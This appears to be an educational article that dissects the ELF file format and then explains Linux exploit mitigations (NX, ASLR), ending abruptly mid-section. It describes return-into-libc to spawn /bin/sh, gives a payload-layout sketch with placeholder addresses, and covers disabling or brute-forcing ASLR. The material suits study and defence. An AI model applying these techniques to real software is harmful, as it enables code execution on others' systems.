Modern systems make attackers’ lives hard, and common exploitation techniques are getting harder to reproduce. The purpose of this article is to give a general overview of mitigation techniques and to cover attacks on 32-bit x86 as a reference for x86_64 architectures, in order to stick with today’s constraints.
We start with an analysis of the ELF file format. After that, we discuss the protections and the ways to bypass them. To finish, we introduce x86_64, which makes exploitation more difficult nowadays.
Pre-requisites:
- Basics in Linux, asm x86,
- a good understanding of buffer overflows, format string exploitations, heap overflows,
- 0x00900dc0ff33,
- Ubuntu 11.04 on x86_64.
- a default song…: Massive Attack – Paradise Circus (Zeds Dead Remix)
Here is the contents:
- The ELF format
- A standard
- Where is it used?
- ELF Layout
- Dissecting the ELF
- The “magic” field
- Reversing ELF’s header
- Sections
- Relocations
- Program Headers
- Exploitations
- Old is always better (for attackers)
- Nonexecutable stack
- Address Space Layout Randomization
- Brute-force
- Return-to-registers
- Stack Canary
- RELRO
- The x86_64 fact and current systems hardening
- References & Acknowledgements
The ELF format
A standard
ELF (Executable and Linking Format) replaced the COFF and “a.out” formats that Linux previously used, and increased flexibility. Indeed, creating shared libraries was difficult and dynamically loading a shared library was cumbersome with the “a.out” format, whereas the ELF format comes with these two benefits[1]:
- It is much simpler to make shared libraries,
- It makes dynamic loading much simpler. Suggested uses for dynamic loading have included super-fast MUDs (Multi-User Domains, also known as “Multi-User Dungeons”), where extra code could be compiled and linked into the running executable without having to stop and restart the program.
This format has been selected by the Tool Interface Standards committee (TIS) as a standard for portable object files for a variety of (Unix-Like) operating systems.
Where is it used?
ELF covers object files (.o), shared libraries (.so) and executables, and is also used for loadable kernel modules. Listing 1 shows which systems[4] have adopted the ELF format:
Listing 1. Applications of ELF format
ELF Layout
An executable ELF file has at least two headers: the ELF header (Elf32_Ehdr/Elf64_Ehdr struct) and the program header (Elf32_Phdr/Elf64_Phdr struct)[5]. There is also a header called the “section header” (Elf32_Shdr/Elf64_Shdr struct), which describes sections such as .text, .data, .bss and so on (we will describe them later).
Figure 1. ELF Layout – execution view and linking view
(source: ELF Format specifications[2])
As you can see in figure 1, there are two views. The linking view is partitioned by sections and is used when a program or library is linked. The sections contain object file information such as data, instructions, relocation information, symbols, debugging information, and so on.
The execution view, on the other hand, is partitioned by segments and is used during program execution. The program header, shown on the left, tells the kernel how to start the program: the kernel walks through the segments and loads them into memory (mmap).
Dissecting the ELF
The “magic” field
In Linux forensics, it is common to use the “file” command to determine the type of a particular file, as follows:
/bin/ls: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped
Now let’s focus on the “ELF” string. As you have probably noticed when using “hexdump” on any ELF file (like /bin/ls for example), the file starts with 0x7f, followed by three bytes that encode the string “ELF”:
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
The first 16 bytes represent the ELF “magic” field, which is a way to identify an ELF file. But if bytes 1, 2 and 3 encode the string “ELF”, what do bytes 4, 5, 6, 7, 8 and 9 represent?
Just have a look at the “elf.h” source code:
#define EI_CLASS 4 /* File class byte index */
#define ELFCLASSNONE 0 /* Invalid class */
#define ELFCLASS32 1 /* 32-bit objects */
#define ELFCLASS64 2 /* 64-bit objects */
#define ELFCLASSNUM 3
#define EI_DATA 5 /* Data encoding byte index */
#define ELFDATANONE 0 /* Invalid data encoding */
#define ELFDATA2LSB 1 /* 2's complement, little endian */
#define ELFDATA2MSB 2 /* 2's complement, big endian */
#define ELFDATANUM 3
#define EI_VERSION 6 /* File version byte index */
/* Value must be EV_CURRENT */
#define EI_OSABI 7 /* OS ABI identification */
#define ELFOSABI_NONE 0 /* UNIX System V ABI */
#define ELFOSABI_SYSV 0 /* Alias. */
#define ELFOSABI_HPUX 1 /* HP-UX */
#define ELFOSABI_NETBSD 2 /* NetBSD. */
#define ELFOSABI_LINUX 3 /* Linux. */
#define ELFOSABI_SOLARIS 6 /* Sun Solaris. */
#define ELFOSABI_AIX 7 /* IBM AIX. */
#define ELFOSABI_IRIX 8 /* SGI Irix. */
#define ELFOSABI_FREEBSD 9 /* FreeBSD. */
#define ELFOSABI_TRU64 10 /* Compaq TRU64 UNIX. */
#define ELFOSABI_MODESTO 11 /* Novell Modesto. */
#define ELFOSABI_OPENBSD 12 /* OpenBSD. */
#define ELFOSABI_ARM_AEABI 64 /* ARM EABI */
#define ELFOSABI_ARM 97 /* ARM */
#define ELFOSABI_STANDALONE 255 /* Standalone (embedded) application */
#define EI_ABIVERSION 8 /* ABI version */
#define EI_PAD 9 /* Byte index of padding bytes */
We can now say with confidence that our file is an ELF of class 64, encoded in little endian, following the UNIX System V ABI, with its padding bytes all set to 0. By the way, as you may have guessed, what we have just decoded is the “e_ident” field of the “Elf64_Ehdr” structure.
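The byte-by-byte reading above can be reproduced in a few lines of Python. This is only a minimal sketch: the 16 bytes are copied from the hexdump of /bin/ls shown earlier, the index constants come from the “elf.h” excerpt, and the lookup tables (CLASSES, ENCODINGS, OSABIS) and the decode_ident() helper are names chosen here for illustration.

```python
# First 16 bytes of /bin/ls, copied from the hexdump shown above.
E_IDENT = bytes.fromhex("7f454c46020101000000000000000000")

# Byte indexes taken from elf.h.
EI_CLASS, EI_DATA, EI_VERSION, EI_OSABI, EI_ABIVERSION, EI_PAD = 4, 5, 6, 7, 8, 9

# Illustrative lookup tables (only a subset of the elf.h values).
CLASSES = {0: "invalid", 1: "ELF32", 2: "ELF64"}
ENCODINGS = {0: "invalid", 1: "little endian", 2: "big endian"}
OSABIS = {0: "UNIX System V", 3: "Linux", 9: "FreeBSD"}


def decode_ident(ident):
    """Decode the e_ident array found at the start of an ELF file."""
    if ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    return {
        "class": CLASSES.get(ident[EI_CLASS], "unknown"),
        "data": ENCODINGS.get(ident[EI_DATA], "unknown"),
        "version": ident[EI_VERSION],
        "osabi": OSABIS.get(ident[EI_OSABI], "unknown"),
        "abiversion": ident[EI_ABIVERSION],
        "padding": ident[EI_PAD:],
    }


info = decode_ident(E_IDENT)
print(info)
```

To try it on a real file, the same function can be fed with the first 16 bytes read from disk, for example open("/bin/ls", "rb").read(16).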
Reversing ELF’s header
To begin the complete dissection, let’s start by writing a simple program as follows:
And produce an ELF object file without linking it:
We will now use readelf from binutils, which together with “objdump” is one of the most used tools for analyzing ELF files, to display every field. That will simplify our analysis, but if you are interested in dissecting ELF files yourself, you can look at libelf; we will also talk about some interesting Python libraries that make it much quicker.
Now, let’s look at the ELF header:
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: REL (Relocatable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x0
Start of program headers: 0 (bytes into file)
Start of section headers: 312 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 0 (bytes)
Number of program headers: 0
Size of section headers: 64 (bytes)
Number of section headers: 13
Section header string table index: 10
The result is quite self-explanatory, but let’s now try to identify these fields using our lovely hexdump tool (in “warrior forensic style!” or not):
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 01 00 3e 00 01 00 00 00 00 00 00 00 00 00 00 00 |..>.............|
00000020 00 00 00 00 00 00 00 00 38 01 00 00 00 00 00 00 |........8.......|
00000030 00 00 00 00 40 00 00 00 00 00 40 00 0d 00 0a 00 |....@.....@.....|
00000040
We already know the first line, but what can we say about the three others? As you can see, in the second line, the first two bytes represent the “e_type”. Indeed, if you look at the “elf.h” file, you can see that “01 00” in little-endian means “Relocatable file”.
Now look at the next two bytes. We have “3e 00”, that is 0x3e, which is equivalent to 62 in decimal (3*16 + 14 = 62) and which defines the AMD x86-64 architecture:
#define EM_X86_64 62 /* AMD x86-64 architecture */
Next comes the “e_version” field, with “01 00 00 00” as a value for “Current version”:
#define EV_NONE 0 /* Invalid ELF version */
#define EV_CURRENT 1 /* Current version */
#define EV_NUM 2
Bytes 24 to 31 hold the entry point address (which is 0x0 as long as the file is not linked). And we finish with the two most important things that we will talk about in this article:
- program headers: none yet, since the file is not linked (offset 0 at bytes 32 to 39 in hexdump, count 0 at bytes 56 and 57),
- section headers: 13 headers (bytes 60 and 61 in hexdump), starting at byte 312 (bytes 40 to 47 in hexdump).
For the rest, we will use readelf and I will let you finish the header part by yourself.
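If you want to check your manual decoding, the whole 64-byte header can be unpacked at once. The sketch below assumes the Elf64_Ehdr field order from “elf.h” and reuses the four hexdump lines of “toto.o” shown above; the Ehdr namedtuple and the variable names are illustrative only.

```python
import struct
from collections import namedtuple

# The 64 header bytes of toto.o, copied from the hexdump above.
HEXDUMP = """
7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
01 00 3e 00 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 38 01 00 00 00 00 00 00
00 00 00 00 40 00 00 00 00 00 40 00 0d 00 0a 00
"""
raw = bytes.fromhex("".join(HEXDUMP.split()))

# Field order of Elf64_Ehdr as declared in elf.h.
Ehdr = namedtuple(
    "Ehdr",
    "e_ident e_type e_machine e_version e_entry e_phoff e_shoff "
    "e_flags e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx",
)

# "<" = little endian, 16s = e_ident, H = 16 bits, I = 32 bits, Q = 64 bits.
EHDR_FORMAT = "<16sHHIQQQIHHHHHH"

hdr = Ehdr._make(struct.unpack(EHDR_FORMAT, raw))
for name, value in hdr._asdict().items():
    print(name, value)
```

The values printed for e_shoff, e_shnum and e_shstrndx can be compared with the “Start of section headers”, “Number of section headers” and “Section header string table index” lines of the readelf output.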
Sections
Let’s just see “toto.o” sections with the following command:
There are 13 section headers, starting at offset 0x138:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .text PROGBITS 0000000000000000 00000040
0000000000000018 0000000000000000 AX 0 0 4
[ 2] .rela.text RELA 0000000000000000 00000598
0000000000000030 0000000000000018 11 1 8
[ 3] .data PROGBITS 0000000000000000 00000058
0000000000000000 0000000000000000 WA 0 0 4
[ 4] .bss NOBITS 0000000000000000 00000058
0000000000000000 0000000000000000 WA 0 0 4
[ 5] .rodata PROGBITS 0000000000000000 00000058
0000000000000010 0000000000000000 A 0 0 1
[ 6] .comment PROGBITS 0000000000000000 00000068
000000000000002b 0000000000000001 MS 0 0 1
[ 7] .note.GNU-stack PROGBITS 0000000000000000 00000093
0000000000000000 0000000000000000 0 0 1
[ 8] .eh_frame PROGBITS 0000000000000000 00000098
0000000000000038 0000000000000000 A 0 0 8
[ 9] .rela.eh_frame RELA 0000000000000000 000005c8
0000000000000018 0000000000000018 11 8 8
[10] .shstrtab STRTAB 0000000000000000 000000d0
0000000000000061 0000000000000000 0 0 1
[11] .symtab SYMTAB 0000000000000000 00000478
0000000000000108 0000000000000018 12 9 8
[12] .strtab STRTAB 0000000000000000 00000580
0000000000000014 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
As you can see, there are a lot of sections, each described by an Elf64_Shdr entry:
- code sections (.text),
- data sections (.data, .bss, .rodata),
- the .comment section, which is used to store extra information,
- relocation tables (.rela.*),
- symbol tables (.symtab),
- section string tables (.shstrtab), which store the name of each section,
- string tables (.strtab).
The address column normally shows where sections should be loaded into virtual memory, but it is not filled in here for any section. The reason is that we have not linked the file yet, so let’s do that:
fluxiux@nyannyan:~$ readelf -S toto
There are 30 section headers, starting at offset 0x1178:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .interp PROGBITS 0000000000400238 00000238
000000000000001c 0000000000000000 A 0 0 1
[ 2] .note.ABI-tag NOTE 0000000000400254 00000254
0000000000000020 0000000000000000 A 0 0 4
[ 3] .note.gnu.build-i NOTE 0000000000400274 00000274
0000000000000024 0000000000000000 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0000000000400298 00000298
000000000000001c 0000000000000000 A 5 0 8
[ 5] .dynsym DYNSYM 00000000004002b8 000002b8
0000000000000060 0000000000000018 A 6 1 8
[ 6] .dynstr STRTAB 0000000000400318 00000318
000000000000003f 0000000000000000 A 0 0 1
[ 7] .gnu.version VERSYM 0000000000400358 00000358
0000000000000008 0000000000000002 A 5 0 2
[ 8] .gnu.version_r VERNEED 0000000000400360 00000360
0000000000000020 0000000000000000 A 6 1 8
[ 9] .rela.dyn RELA 0000000000400380 00000380
0000000000000018 0000000000000018 A 5 0 8
[10] .rela.plt RELA 0000000000400398 00000398
0000000000000030 0000000000000018 A 5 12 8
[11] .init PROGBITS 00000000004003c8 000003c8
0000000000000018 0000000000000000 AX 0 0 4
[12] .plt PROGBITS 00000000004003e0 000003e0
0000000000000030 0000000000000010 AX 0 0 4
[13] .text PROGBITS 0000000000400410 00000410
00000000000001d8 0000000000000000 AX 0 0 16
[14] .fini PROGBITS 00000000004005e8 000005e8
000000000000000e 0000000000000000 AX 0 0 4
[15] .rodata PROGBITS 00000000004005f8 000005f8
0000000000000014 0000000000000000 A 0 0 4
[16] .eh_frame_hdr PROGBITS 000000000040060c 0000060c
0000000000000024 0000000000000000 A 0 0 4
[17] .eh_frame PROGBITS 0000000000400630 00000630
000000000000007c 0000000000000000 A 0 0 8
[18] .ctors PROGBITS 0000000000600e28 00000e28
0000000000000010 0000000000000000 WA 0 0 8
[19] .dtors PROGBITS 0000000000600e38 00000e38
0000000000000010 0000000000000000 WA 0 0 8
[20] .jcr PROGBITS 0000000000600e48 00000e48
0000000000000008 0000000000000000 WA 0 0 8
[21] .dynamic DYNAMIC 0000000000600e50 00000e50
0000000000000190 0000000000000010 WA 6 0 8
[22] .got PROGBITS 0000000000600fe0 00000fe0
0000000000000008 0000000000000008 WA 0 0 8
[23] .got.plt PROGBITS 0000000000600fe8 00000fe8
0000000000000028 0000000000000008 WA 0 0 8
[24] .data PROGBITS 0000000000601010 00001010
0000000000000010 0000000000000000 WA 0 0 8
[25] .bss NOBITS 0000000000601020 00001020
0000000000000010 0000000000000000 WA 0 0 8
[26] .comment PROGBITS 0000000000000000 00001020
0000000000000054 0000000000000001 MS 0 0 1
[27] .shstrtab STRTAB 0000000000000000 00001074
00000000000000fe 0000000000000000 0 0 1
[28] .symtab SYMTAB 0000000000000000 000018f8
0000000000000600 0000000000000018 29 46 8
[29] .strtab STRTAB 0000000000000000 00001ef8
00000000000001f2 0000000000000000 0 0 1
Wow! Some new sections appeared:
- .interp, which holds the pathname of the program interpreter,
- code sections (.plt, .init, .fini),
- table of imported/exported symbols (.dynsym),
- dynamic names table (.dynstr),
- dynamic hash table (.gnu.hash),
- new relocation tables (.rela.*),
- constructor and destructor tables (.ctors, .dtors),
- sections reserved for dynamic binaries (.got, .dynamic, .plt).
After the address column, you have the offset of the section within the file, then the size of each section in bytes, the size of each entry for sections that hold a table of fixed-size entries (EntSize), the flags (Write, Alloc, Execute, and so on), the Link and Info fields, and the required alignment.
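The letters in the Flags column are only a rendering of the numeric sh_flags field. As a rough sketch, assuming the SHF_* bit values from “elf.h” (SHF_WRITE = 0x1, SHF_ALLOC = 0x2, SHF_EXECINSTR = 0x4, SHF_MERGE = 0x10, SHF_STRINGS = 0x20), the conversion could look like this; flags_to_letters() is a helper name made up for the example and only covers these five flags.

```python
# (bit value, letter) pairs, in the order readelf prints them.
SHF_FLAGS = [
    (0x1, "W"),   # SHF_WRITE: writable at run time
    (0x2, "A"),   # SHF_ALLOC: occupies memory during execution
    (0x4, "X"),   # SHF_EXECINSTR: contains executable instructions
    (0x10, "M"),  # SHF_MERGE: may be merged
    (0x20, "S"),  # SHF_STRINGS: contains NUL-terminated strings
]


def flags_to_letters(sh_flags):
    """Render a numeric sh_flags value the way readelf -S does."""
    return "".join(letter for bit, letter in SHF_FLAGS if sh_flags & bit)


for name, value in [(".text", 0x6), (".data", 0x3), (".rodata", 0x2), (".comment", 0x30)]:
    print(name, flags_to_letters(value))
```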
In this article, we will discover some important sections to target for any attack.
Relocations
Relocation modifies the memory image of the mapped segments so that they can be executed. As you saw before, there are some “.rela.*” sections, which describe where to patch the memory and how. Let’s look at the different relocations using our favorite tool “readelf”:
Relocation section '.rela.dyn' at offset 0x380 contains 1 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000600fe0 000200000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
Relocation section '.rela.plt' at offset 0x398 contains 2 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000601000 000100000007 R_X86_64_JUMP_SLO 0000000000000000 printf + 0
000000601008 000300000007 R_X86_64_JUMP_SLO 0000000000000000 __libc_start_main + 0
For example, for “printf” it means that the dynamic linker has to patch the address 0x000000601000, which is a slot of the .got.plt section.
For more information, you also have a description of the relocation types in “elf.h”:
#define R_X86_64_NONE 0 /* No reloc */
[...]
#define R_X86_64_GLOB_DAT 6 /* Create GOT entry */
#define R_X86_64_JUMP_SLOT 7 /* Create PLT entry */
[...]
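The Info column of the readelf output packs two values together: the symbol index in the upper 32 bits and the relocation type in the lower 32 bits (this is what the ELF64_R_SYM and ELF64_R_TYPE macros of “elf.h” compute). A small sketch, using the three entries listed above; split_r_info() and the R_TYPES table are illustrative names.

```python
# Relocation types quoted from the elf.h excerpt above.
R_TYPES = {0: "R_X86_64_NONE", 6: "R_X86_64_GLOB_DAT", 7: "R_X86_64_JUMP_SLOT"}

# (offset, info, symbol name) copied from the readelf output above.
RELOCATIONS = [
    (0x600fe0, 0x000200000006, "__gmon_start__"),
    (0x601000, 0x000100000007, "printf"),
    (0x601008, 0x000300000007, "__libc_start_main"),
]


def split_r_info(r_info):
    """Return (symbol index, relocation type) from a 64-bit r_info value."""
    return r_info >> 32, r_info & 0xFFFFFFFF


for offset, info, name in RELOCATIONS:
    sym, rtype = split_r_info(info)
    print(hex(offset), name, "symbol index", sym, R_TYPES.get(rtype, rtype))
```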
Program Headers
The section header table is not loaded into memory, because neither the kernel nor the dynamic loader uses that table. To load a file into memory, program headers are used to provide the required information:
Elf file type is EXEC (Executable file)
Entry point 0x400410
There are 9 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000040 0x0000000000400040 0x0000000000400040 0x0001f8 0x0001f8 R E 0x8
INTERP 0x000238 0x0000000000400238 0x0000000000400238 0x00001c 0x00001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x0006ac 0x0006ac R E 0x200000
LOAD 0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001f8 0x000208 RW 0x200000
DYNAMIC 0x000e50 0x0000000000600e50 0x0000000000600e50 0x000190 0x000190 RW 0x8
NOTE 0x000254 0x0000000000400254 0x0000000000400254 0x000044 0x000044 R 0x4
GNU_EH_FRAME 0x00060c 0x000000000040060c 0x000000000040060c 0x000024 0x000024 R 0x4
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x8
GNU_RELRO 0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001d8 0x0001d8 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag .note.gnu.build-id
06 .eh_frame_hdr
07
08 .ctors .dtors .jcr .dynamic .got
As you can see, each program header corresponds to one segment, which groups the sections listed next to it. But how does it work?
In the beginning, when the kernel sees the INTERP segment, it first loads the LOAD segments at the specified virtual addresses, then loads the segments of the program interpreter (/lib64/ld-linux-x86-64.so.2) and jumps to the interpreter’s entry point. After that, the loader gets control and loads the libraries specified in LD_PRELOAD, as well as the libraries marked as NEEDED in the DYNAMIC segment of the executable:
Dynamic section at offset 0xe50 contains 20 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
After relocations, the loader invokes the INIT function of every library and then jumps to the executable’s entry point.
For a static binary, there is less to say, because the kernel only loads the LOAD segments at their virtual addresses and then jumps to the entry point (easy eh?).
For more details, you can read an old but very good article about ELF dissection by Eric Youngdale, published in Linux Journal #13[6].
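The “Section to Segment mapping” printed by readelf is nothing magic: a section belongs to a segment when its address range fits inside the segment’s range. The following sketch recomputes part of that mapping from a few addresses and sizes copied from the listings above (only a subset of the sections is included, and the dictionary keys are labels chosen for the example).

```python
# name: (virtual address, size in memory), copied from readelf -l above.
SEGMENTS = {
    "LOAD (R E)": (0x400000, 0x6AC),
    "LOAD (RW)": (0x600E28, 0x208),
    "GNU_RELRO": (0x600E28, 0x1D8),
}

# name: (address, size), copied from readelf -S above (subset only).
SECTIONS = {
    ".text": (0x400410, 0x1D8),
    ".rodata": (0x4005F8, 0x14),
    ".ctors": (0x600E28, 0x10),
    ".got": (0x600FE0, 0x8),
    ".got.plt": (0x600FE8, 0x28),
    ".data": (0x601010, 0x10),
    ".bss": (0x601020, 0x10),
}


def sections_in(segment):
    """List the sections whose address range lies inside the given segment."""
    start, size = SEGMENTS[segment]
    end = start + size
    return [name for name, (addr, length) in SECTIONS.items()
            if start <= addr and addr + length <= end]


for segment in SEGMENTS:
    print(segment, sections_in(segment))
```

Note how .got.plt falls inside the writable LOAD segment but not inside GNU_RELRO, which matches the mapping shown by readelf.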
Exploitation
Old is always better (for attackers)
Once upon a time, you were at home, waiting for the rain to stop. As always, you “googled” for some interesting information (of course!) and you found a kind of bible: Smashing the Stack for Fun and Profit[7].
By identifying the stack address, putting your shellcode at the beginning, adding some padding and overwriting EIP, you could execute anything you wanted while exploiting a stack overflow. But times have changed, and you are now confronted with canaries, ASLR (Address Space Layout Randomization), non-executable stacks, RELRO (read-only relocations), PIE support, binary-to-text encoding, and so on.
Nonexecutable stack
To make the stack non-executable, we use the NX bit (No eXecute, for AMD) or the XD bit (eXecute Disable, for Intel). In figure 2, you can see that it corresponds to the most significant bit of a 64-bit Page Table Entry:
Figure 2 – 64-bit Page Table Entry
(Source: A hardware-enforced BOF protection)
So when trying to exploit a stack-based overflow, you may be surprised that your shellcode doesn’t do what you expected: that’s the power of the NX bit (NX = 0 → Execute, NX = 1 → No eXecute).
Using “readelf -l” you can see whether the stack is executable or not:
0x0000000000000000 0x0000000000000000 RW 8
As you can see, the only flags we get are Read and Write. You can set the eXecute flag using “execstack -s [binaryfile]” and see the difference (RWE).
To bypass it, we can use a method called “Return-into-libc”. Indeed, we know that any program linked against libc has access to its shared functions (such as printf, exit, and so on), so we can execute “system(“/bin/sh”)” to get a shell.
First, we fill the vulnerable buffer with some junk data up to the saved EIP (“AAAAAAAAAHH…”! is great). After that, we have to find the address of the “system()” function and, if we want to exit the program properly, the address of “exit()” as well (using gdb):
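The “RW” and “RWE” strings printed by readelf come from the p_flags field of the GNU_STACK program header. As a minimal sketch, assuming the PF_* values defined in “elf.h” (PF_X = 0x1, PF_W = 0x2, PF_R = 0x4), the check boils down to one bit test; the two helper functions are names invented for the example.

```python
# Segment permission bits as defined in elf.h.
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def describe(p_flags):
    """Render p_flags the way readelf -l prints them (R, W, E)."""
    return "".join(letter for bit, letter in ((PF_R, "R"), (PF_W, "W"), (PF_X, "E"))
                   if p_flags & bit)


def stack_is_executable(gnu_stack_flags):
    """True when the GNU_STACK segment asks for an executable stack."""
    return bool(gnu_stack_flags & PF_X)


for flags in (PF_R | PF_W, PF_R | PF_W | PF_X):
    print(describe(flags), "executable stack:", stack_is_executable(flags))
```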
Starting program: /home/fluxius/toto main
huhu la charrue
Program exited with code 017.
(gdb) p system
$1 = {<text variable, no debug info>} 0x7ffff6b8a134 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x7ffff6b81890 <exit>
Then, we overwrite the return address with the address of the system() function, followed by the address of the exit() function. To finish, we put the address of the string “/bin/sh” (which you can find by searching memory, with memcmp() for instance, or place in an environment variable).
Inject = [junk][system()][exit()][”/bin/sh”]
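To make the layout above more concrete, here is how such a buffer could be assembled for a 32-bit target. This is only an illustration of the byte layout: the offset and the three addresses are placeholders invented for the example (they come neither from this article nor from a real process), and ret2libc_payload() is a hypothetical helper.

```python
import struct


def ret2libc_payload(offset, system_addr, exit_addr, binsh_addr):
    """Lay out [junk][system()][exit()]["/bin/sh"] for a 32-bit target."""
    junk = b"A" * offset              # fills the buffer up to the saved EIP
    chain = struct.pack(
        "<III",                       # three little-endian 32-bit words
        system_addr,                  # overwrites the return address
        exit_addr,                    # return address seen by system()
        binsh_addr,                   # first argument of system()
    )
    return junk + chain


# Placeholder values only, chosen so that they are easy to spot in a dump.
payload = ret2libc_payload(offset=64,
                           system_addr=0x41414141,
                           exit_addr=0x42424242,
                           binsh_addr=0x43434343)
print(len(payload), payload[-12:])
```

The order matters: on 32-bit x86, the word that follows the address of system() is the return address that system() will use, which is why exit() comes before the pointer to “/bin/sh”.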
Note: on 32-bit x86, the NX bit is only available with Physical Address Extension (PAE), but it can be emulated by PaX or ExecShield.
Moreover, we will see later that on x86_64 platforms this form of “return-into-libc” doesn’t work because of the ABI specifications[8] (arguments are passed in registers rather than on the stack), and that’s probably a problem you’ve already encountered.
Address Space Layout Randomization
To prevent attackers from executing a dangerous shellcode, people created a concept named “ASLR” (Address Space Layout Randomization). It is a technique that randomizes the position of the stack, heap, text, vdso, shared libraries and the base address of the executable (when built with Position-Independent Executable support). So if you try to jump to a shellcode at a previously recorded address, you will observe a failure: the shellcode isn’t executed (unless you are very lucky) and you get the classic segmentation fault, as the program did not end properly.
When studying a stack overflow for example, you can disable ASLR by changing the current level to “0”:
There is another trick (proposed by “perror”) that does not require “root” privileges: using “setarch” to change the reported architecture in a new program environment and to set personality flags:
But it’s not much fun, is it? So, attackers have found some ways to bypass this kind of protection. In older kernels, they noticed that ESP points to the stack and, of course, the buffer is on the stack too. One technique relied on the instructions of linux-gate, which was mapped at a static address before kernel 2.6.18, to find the address of an interesting pattern such as “\xff\xe4” (“jmp esp” on x86) in memory. Other techniques to bypass ASLR exist, like brute force.
Brute-force
Thinking about exec() family functions, we can use “execl” to replace the current process image with a new process image. Let’s make a simple code to observe the randomization:
If ASLR is enabled, you should see something like this:
Buffer address : 0x7fff5e149710
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address : 0x7fff71f6f0b0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address : 0x7fff763299c0
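A quick way to see which part of the address actually moves is to XOR the observed values together. The sketch below uses the three addresses printed above; keep in mind that three samples only give a lower bound on the randomization, and that varying_bits() is just a helper written for this example.

```python
# Addresses printed by three runs of buffer_addr (copied from the output above).
ADDRESSES = [0x7fff5e149710, 0x7fff71f6f0b0, 0x7fff763299c0]


def varying_bits(addresses):
    """Return a mask whose set bits differ between at least two addresses."""
    mask = 0
    for addr in addresses[1:]:
        mask |= addresses[0] ^ addr
    return mask


mask = varying_bits(ADDRESSES)
print("mask of varying bits:", hex(mask))
print("number of bits seen changing:", bin(mask).count("1"))
print("highest changing bit:", mask.bit_length() - 1)
```

With more samples, the mask fills up and gives a better idea of how many bits an attacker would really have to guess.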
We see that 4 bytes change at each execution, so we would have to be very lucky to land in our shellcode if we tried the brute-force way. So we will now use “execl” to look for any weakness when the memory layout is randomized for the process:
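#include <stdio.h>
#include <unistd.h>
int main(void)
{
    int stack;
    printf("Stack address: %p\n", (void *)&stack);
    /* Replace the current process image with buffer_addr */
    execl("./buffer_addr", "buffer_addr", (char *)NULL);
    return 1; /* only reached if execl() fails */
}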
Compare the memory layouts with different runs of “buffer_addr”:
Buffer address: 0x7fffc5cfa180
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff1964d1f0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffba20bd30
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffc8505ed0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7ffff39cbc10
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff6eb3aa90
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc5cfa180 - 0x7fff1964d1f0"
$1 = 2892681104
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc8505ed0 - 0x7fffba20bd30"
$1 = 238002592
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffff39cbc10 - 0x7fff6eb3aa90"
$1 = 2229866880
And now with “execl” function:
Stack address: 0x7fff526d959c
Buffer address: 0x7fff2e95efd0
fluxiux@handgrep:~/aslr$ gdb -q --batch -ex "p 0x7fffaffcde50 - 0x7fff54800abc"
$1 = 1534907284
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffdaf7d5fc - 0x7fff08361da0"
$1 = 3535911004
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7ffffbe8326c
Buffer address: 0x7fff792120c0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffffbe8326c - 0x7fff792120c0"
$1 = 2194084268
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
